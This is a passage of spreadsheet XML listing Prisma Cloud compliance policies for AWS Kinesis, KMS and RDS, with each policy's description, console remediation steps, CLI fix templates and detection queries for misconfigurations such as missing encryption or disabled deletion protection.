        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B66" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C66" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D66" t="inlineStr"/>
      <c r="E66" t="inlineStr"/>
      <c r="F66" t="inlineStr"/>
      <c r="G66" t="b">
        <v>1</v>
      </c>
      <c r="H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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J66" t="inlineStr">
        <is>
          <t>aws-kinesis</t>
        </is>
      </c>
      <c r="K66" t="inlineStr">
        <is>
          <t>AWS Kinesis streams are not encrypted using Server Side Encryption</t>
        </is>
      </c>
      <c r="L66" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M66" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N66" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O66" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P66" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q66" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R66" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S66" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T66" t="b">
        <v>0</v>
      </c>
      <c r="U66" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V66" t="inlineStr">
        <is>
          <t>aws-kinesis-list-streams</t>
        </is>
      </c>
      <c r="W66" t="inlineStr">
        <is>
          <t>This Policy identifies the AWS Kinesis streams which are not encrypted using Server Side Encryption. Server Side Encryption is used to encrypt your sensitive data before it is written to the Kinesis stream storage layer and decrypted after it is retrieved from storage.</t>
        </is>
      </c>
      <c r="X66" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console
2. Go to Kinesis Service
3. Select the reported Kinesis data stream for the corresponding region
4. Under Server-side encryption, Click on Edit
5. Choose Enabled
6. Under KMS master key, You can choose any KMS other than the default (Default) aws/kinesis
7. Click Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-22
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-22</t>
        </is>
      </c>
      <c r="Y66" t="inlineStr"/>
      <c r="Z66" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-kinesis-list-streams' AND json.rule = 'encryptionType equals NONE or encryptionType does not exist'
{"category":"General","resourceTypes":["aws_kinesis_stream"]}</t>
        </is>
      </c>
      <c r="AA66" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB66" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC66" t="inlineStr">
        <is>
          <t>PC-AWS-KNS-172-CKV_AWS_43</t>
        </is>
      </c>
      <c r="AD66" t="b">
        <v>1</v>
      </c>
      <c r="AE66" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF66" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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6" t="inlineStr">
        <is>
          <t>8fd3611b-3298-483c-a1ec-0df3fc1ded8d</t>
        </is>
      </c>
      <c r="AI66" t="inlineStr">
        <is>
          <t>6ceaee38-344c-4249-8cff-eb62a8ee94ed</t>
        </is>
      </c>
      <c r="AJ66" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK66" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B67" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C67" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D67" t="inlineStr"/>
      <c r="E67" t="inlineStr"/>
      <c r="F67" t="inlineStr"/>
      <c r="G67" t="b">
        <v>0</v>
      </c>
      <c r="H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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J67" t="inlineStr">
        <is>
          <t>aws-kms</t>
        </is>
      </c>
      <c r="K67" t="inlineStr">
        <is>
          <t>AWS KMS Key scheduled for deletion</t>
        </is>
      </c>
      <c r="L67" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M67" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N67" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O67" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P67" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q67" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R67" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S67" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T67" t="b">
        <v>0</v>
      </c>
      <c r="U67" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V67" t="inlineStr">
        <is>
          <t>aws-kms-get-key-rotation-status</t>
        </is>
      </c>
      <c r="W67" t="inlineStr">
        <is>
          <t>This policy identifies KMS Keys which are scheduled for deletion. Deleting keys in AWS KMS is destructive and potentially dangerous. It deletes the key material and all metadata associated with it and is irreversible. After a key is deleted, you can no longer decrypt the data that was encrypted under that key, which means that data becomes unrecoverable. You should delete a key only when you are sure that you don't need to use it anymore. If you are not sure, It is recommended that to disable the key instead of deleting it.</t>
        </is>
      </c>
      <c r="X67" t="inlineStr">
        <is>
          <t>You should delete a KMS key only when you are sure that you don't need to use it anymore. To fix this alert, If you sure you no longer need a reported KMS key; dismiss the alert. If you are not sure, consider disabling the KMS key instead of deleting it.
To enable KMS CMKs which are scheduled for deletion, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Key Management Service (KMS)
4. Click on 'Customer managed keys' (Left Panel)
5. Select reported KMS Customer managed key
6. Click on 'Key actions' dropdown
7. Click on 'Cancel key deletion'
8. Click on 'Enable'</t>
        </is>
      </c>
      <c r="Y67" t="inlineStr"/>
      <c r="Z67" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-kms-get-key-rotation-status' AND json.rule = 'keyMetadata.keyState contains PendingDeletion'</t>
        </is>
      </c>
      <c r="AA67" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB67" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC67" t="inlineStr">
        <is>
          <t>PC-AWS-KMS-241</t>
        </is>
      </c>
      <c r="AD67" t="b">
        <v>1</v>
      </c>
      <c r="AE67" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF67" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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7" t="inlineStr">
        <is>
          <t>4779ab55-2f4b-48cf-b4a9-828165a73f77</t>
        </is>
      </c>
      <c r="AI67" t="inlineStr">
        <is>
          <t>bbb3d3f9-3caa-47ef-8ac0-d40e7f891312</t>
        </is>
      </c>
      <c r="AJ67" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK67" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B68" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C68" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D68" t="inlineStr"/>
      <c r="E68" t="inlineStr"/>
      <c r="F68" t="inlineStr"/>
      <c r="G68" t="b">
        <v>1</v>
      </c>
      <c r="H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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J68" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K68" t="inlineStr">
        <is>
          <t>AWS RDS DB cluster encryption is disabled</t>
        </is>
      </c>
      <c r="L68" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M68" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N68" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O68" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P68" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q68" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R68" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S68" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T68" t="b">
        <v>0</v>
      </c>
      <c r="U68" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V68" t="inlineStr">
        <is>
          <t>aws-rds-db-cluster</t>
        </is>
      </c>
      <c r="W68" t="inlineStr">
        <is>
          <t>This policy identifies RDS DB clusters for which encryption is disabled. Amazon Aurora encrypted DB clusters provide an additional layer of data protection by securing your data from unauthorized access to the underlying storage. You can use Amazon Aurora encryption to increase data protection of your applications deployed in the cloud, and to fulfill compliance requirements for data-at-rest encryption.
NOTE: This policy is applicable only for Aurora DB clusters.
https://docs.aws.amazon.com/cli/latest/reference/rds/describe-db-clusters.html</t>
        </is>
      </c>
      <c r="X68" t="inlineStr">
        <is>
          <t>AWS DB clusters can be encrypted only while creating the database cluster. You can't convert an unencrypted DB cluster to an encrypted one. However, you can restore an unencrypted Aurora DB cluster snapshot to an encrypted Aurora DB cluster. To do this, specify a KMS encryption key when you restore from the unencrypted DB cluster snapshot.
For AWS RDS,
1. To create a 'Snapshot' of the unencrypted DB cluster, follow the instruction mentioned in below link:
RDS Link: https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_CreateSnapshotCluster.html
NOTE: As you can't restore from a DB cluster snapshot to an existing DB cluster; a new DB cluster is created when you restore. Once the Snapshot status is 'Available', delete the unencrypted DB cluster before restoring from the DB cluster Snapshot by following below steps for AWS RDS,
a. Sign to the AWS Management Console and open the Amazon RDS console at https://console.aws.amazon.com/rds/
b. In the navigation pane, choose 'Databases'.
c. In the list of DB instances, choose a writer instance for the DB cluster.
d. Choose 'Actions', and then choose 'Delete'.
2. To restoring the Cluster from a DB Cluster Snapshot, follow the instruction mentioned in below link:
RDS Link: https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_RestoreFromSnapshot.html
For AWS Document DB,
1. To create a 'Snapshot' of the unencrypted DB cluster, follow the instruction mentioned in below link:
Document DB Link: https://docs.aws.amazon.com/documentdb/latest/developerguide/backup_restore-create_manual_cluster_snapshot.html
NOTE: As you can't restore from a DB cluster snapshot to an existing DB cluster; a new DB cluster is created when you restore. Once the Snapshot status is 'Available', delete the unencrypted DB cluster before restoring from the DB cluster Snapshot by following below steps for AWS Document DB, 
  a. Sign to the AWS Management Console and open the Amazon DocumentDB console at https://console.aws.amazon.com/docdb/
  b. In the navigation pane, choose 'Clusters'.
  c. Select the cluster from the list which needs to be deleted
  d. Choose 'Actions', and then choose 'Delete'.
2. To restoring the Cluster from a DB Cluster Snapshot, follow the instruction mentioned in below link:
Document DB Link: https://docs.aws.amazon.com/documentdb/latest/developerguide/backup_restore-restore_from_snapshot.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-4
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-4</t>
        </is>
      </c>
      <c r="Y68" t="inlineStr"/>
      <c r="Z68" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-db-cluster' AND json.rule =  'storageEncrypted is false'
{"category":"General","resourceTypes":["aws_db_instance"]}</t>
        </is>
      </c>
      <c r="AA68" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB68" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC68" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-403-CKV_AWS_16</t>
        </is>
      </c>
      <c r="AD68" t="b">
        <v>1</v>
      </c>
      <c r="AE68" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF68" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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8" t="inlineStr">
        <is>
          <t>dae26f3c-d05a-4499-bdcd-fc5c32e3891f</t>
        </is>
      </c>
      <c r="AI68" t="inlineStr">
        <is>
          <t>bf007096-b372-4921-848c-11b29e042f4f</t>
        </is>
      </c>
      <c r="AJ68" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK68" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B69" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C69" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D69" t="inlineStr"/>
      <c r="E69" t="inlineStr"/>
      <c r="F69" t="inlineStr"/>
      <c r="G69" t="b">
        <v>1</v>
      </c>
      <c r="H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9" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J69" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K69" t="inlineStr">
        <is>
          <t>AWS RDS cluster delete protection is disabled</t>
        </is>
      </c>
      <c r="L69" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M69" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N69" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O69" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P69" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q69" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R69" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S69" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T69" t="b">
        <v>1</v>
      </c>
      <c r="U69" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V69" t="inlineStr">
        <is>
          <t>aws-rds-db-cluster</t>
        </is>
      </c>
      <c r="W69" t="inlineStr">
        <is>
          <t>This policy identifies RDS clusters for which delete protection is disabled. Enabling delete protection for these RDS clusters prevents irreversible data loss resulting from accidental or malicious operations.</t>
        </is>
      </c>
      <c r="X69" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the Amazon RDS dashboard 
4. Click on the DB clusters
5. Select the reported DB cluster
6. Click on the 'Modify' button
7. In Modify DB cluster page, In the 'Additional configuration' section, Check the box 'Enable deletion protection' for Deletion protection. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-rds-clusters-and-instances-have-deletion-protection-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-rds-clusters-and-instances-have-deletion-protection-enabled</t>
        </is>
      </c>
      <c r="Y69" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBCluster' permission. Successful execution will enable deletion protection for the reported AWS RDS cluster.",
'impact': 'Enables deletion protection setting for AWS RDS cluster',
'cliScriptTemplate': 'aws rds modify-db-cluster --db-cluster-identifier $resourceName --region $region --deletion-protection'</t>
        </is>
      </c>
      <c r="Z69" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-db-cluster' AND json.rule = status contains available and deletionProtection is false
{"category":"General","resourceTypes":["aws_rds_cluster"]}</t>
        </is>
      </c>
      <c r="AA69" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB69" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC69" t="inlineStr">
        <is>
          <t>PC-AWS-EC2-702-CKV_AWS_139</t>
        </is>
      </c>
      <c r="AD69" t="b">
        <v>1</v>
      </c>
      <c r="AE69" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF69" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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9" t="inlineStr">
        <is>
          <t>e058fabb-cc5c-4c19-88ed-b5d599044a92</t>
        </is>
      </c>
      <c r="AI69" t="inlineStr">
        <is>
          <t>e27af8ed-2e01-4daa-84a6-5e3f56d9ba78</t>
        </is>
      </c>
      <c r="AJ69" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK69" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B70" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C70" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D70" t="inlineStr"/>
      <c r="E70" t="inlineStr"/>
      <c r="F70" t="inlineStr"/>
      <c r="G70" t="b">
        <v>1</v>
      </c>
      <c r="H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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J70" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K70" t="inlineStr">
        <is>
          <t>AWS RDS cluster not configured with IAM authentication</t>
        </is>
      </c>
      <c r="L70" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M70" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N70" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O70" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P70" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q70" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R70" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S70" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T70" t="b">
        <v>1</v>
      </c>
      <c r="U70" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V70" t="inlineStr">
        <is>
          <t>aws-rds-db-cluster</t>
        </is>
      </c>
      <c r="W70" t="inlineStr">
        <is>
          <t>This policy identifies RDS clusters that are not configured with IAM authentication. If you enable IAM authentication you don't need to store user credentials in the database, because authentication is managed externally using IAM. IAM database authentication provides the network traffic to and from database clusters is encrypted using Secure Sockets Layer (SSL), Centrally manage access to your database resources and Profile credentials instead of a password, for greater security.
For details:
https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/UsingWithRDS.IAMDBAuth.html</t>
        </is>
      </c>
      <c r="X70" t="inlineStr">
        <is>
          <t>To enable IAM authentication on your RDS cluster follow the below mentioned URL:
https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/UsingWithRDS.IAMDBAuth.Enabling.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-rds-cluster-has-iam-authentication-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-rds-cluster-has-iam-authentication-enabled</t>
        </is>
      </c>
      <c r="Y70" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBCluster' permission. Successful execution will enable IAM Authentication for the reported AWS RDS cluster.",
'impact': 'Enables IAM Authentication setting for AWS RDS cluster',
'cliScriptTemplate': 'aws rds modify-db-cluster --db-cluster-identifier $resourceName --region $region --enable-iam-database-authentication'</t>
        </is>
      </c>
      <c r="Z70" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-rds-db-cluster' AND json.rule = status contains available and (engine contains postgres or engine contains mysql) and iamdatabaseAuthenticationEnabled is false
{"category":"IAM","resourceTypes":["aws_rds_cluster"]}</t>
        </is>
      </c>
      <c r="AA70" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB70" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC70" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-709-CKV_AWS_162</t>
        </is>
      </c>
      <c r="AD70" t="b">
        <v>1</v>
      </c>
      <c r="AE70" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF70" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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0" t="inlineStr">
        <is>
          <t>252430b3-1996-496c-9257-ad054cd24a5f</t>
        </is>
      </c>
      <c r="AI70" t="inlineStr">
        <is>
          <t>f79f0e00-fcf1-49ef-ab0c-b3db225b086d</t>
        </is>
      </c>
      <c r="AJ70" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK70" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B71" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C71" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D71" t="inlineStr"/>
      <c r="E71" t="inlineStr"/>
      <c r="F71" t="inlineStr"/>
      <c r="G71" t="b">
        <v>1</v>
      </c>
      <c r="H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lsekar,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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J71" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K71" t="inlineStr">
        <is>
          <t>AWS RDS instance not configured with IAM authentication</t>
        </is>
      </c>
      <c r="L71" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M71" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N71" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O71" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P71" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q71" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R71" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S71" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T71" t="b">
        <v>1</v>
      </c>
      <c r="U71" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V71" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W71" t="inlineStr">
        <is>
          <t>This policy identifies RDS instances that are not configured with IAM authentication. If you enable IAM authentication you don't need to store user credentials in the database, because authentication is managed externally using IAM. IAM database authentication provides the network traffic to and from database instances is encrypted using Secure Sockets Layer (SSL), Centrally manage access to your database resources and Profile credentials instead of a password, for greater security.
For details:
https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.html
NOTE: IAM database authentication works only with MySQL and PostgreSQL. IAM database authentication is not available on all database engines; please refer https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.html#UsingWithRDS.IAMDBAuth.Availability for available versions.</t>
        </is>
      </c>
      <c r="X71" t="inlineStr">
        <is>
          <t>To enable IAM authentication follow the below mentioned URL:
https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.Enabling.html</t>
        </is>
      </c>
      <c r="Y71" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBInstance' permission. Successful execution will enable IAM Authentication for the reported AWS RDS instance.",
'impact': 'Enables IAM Authentication setting for AWS RDS instance',
'cliScriptTemplate': 'aws rds modify-db-instance --db-instance-identifier $resourceName --region $region --enable-iam-database-authentication'</t>
        </is>
      </c>
      <c r="Z71" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-rds-describe-db-instances' AND json.rule = dbinstanceStatus contains available and dbclusterIdentifier does not exist and (engine contains postgres or engine contains mysql) and engineVersion is not member of (8.0.11, 8.0.13, 8.0.15, 9.6.1, 9.6.2, 9.6.3, 9.6.5, 9.6.6, 9.6.8, 9.6.9, 9.6.10, 10.1, 10.3, 10.4, 10.5) and iamdatabaseAuthenticationEnabled is false</t>
        </is>
      </c>
      <c r="AA71" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB71" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC71" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-708</t>
        </is>
      </c>
      <c r="AD71" t="b">
        <v>1</v>
      </c>
      <c r="AE71" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF71" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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lsekar - Notifications:, AccountGroups:Lsekar-AWSAccount;,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1" t="inlineStr">
        <is>
          <t>6b67753f-156b-4249-bbea-2ff6eeff4542</t>
        </is>
      </c>
      <c r="AI71" t="inlineStr">
        <is>
          <t>005ab558-f5e8-49e4-b472-7bad3f70987a</t>
        </is>
      </c>
      <c r="AJ71" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK71" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B72" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C72" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D72" t="inlineStr"/>
      <c r="E72" t="inlineStr"/>
      <c r="F72" t="inlineStr"/>
      <c r="G72" t="b">
        <v>1</v>
      </c>
      <c r="H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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J72" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K72" t="inlineStr">
        <is>
          <t>AWS RDS instance is not encrypted</t>
        </is>
      </c>
      <c r="L72" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M72" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N72" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O72" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P72" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q72" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R72" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S72" t="inlineStr">
        <is>
          <t>PCI DSS v3.2,Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T72" t="b">
        <v>0</v>
      </c>
      <c r="U72" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V72" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W72" t="inlineStr">
        <is>
          <t>This policy identifies AWS RDS instances which are not encrypted. Amazon Relational Database Service (Amazon RDS) is a web service that makes it easier to set up and manage databases. Amazon allows customers to turn on encryption for RDS which is recommended for compliance and security reasons.</t>
        </is>
      </c>
      <c r="X72" t="inlineStr">
        <is>
          <t>Amazon RDS instance can only be encrypted at the time of DB instance creation. So to resolve this alert, create a new DB instance with encryption and then migrate all required DB instance data from the reported DB instance to this newly created DB instance.
To create RDS DB instance with encryption, follow the instructions mentioned in below reference link based on your Database vendor:
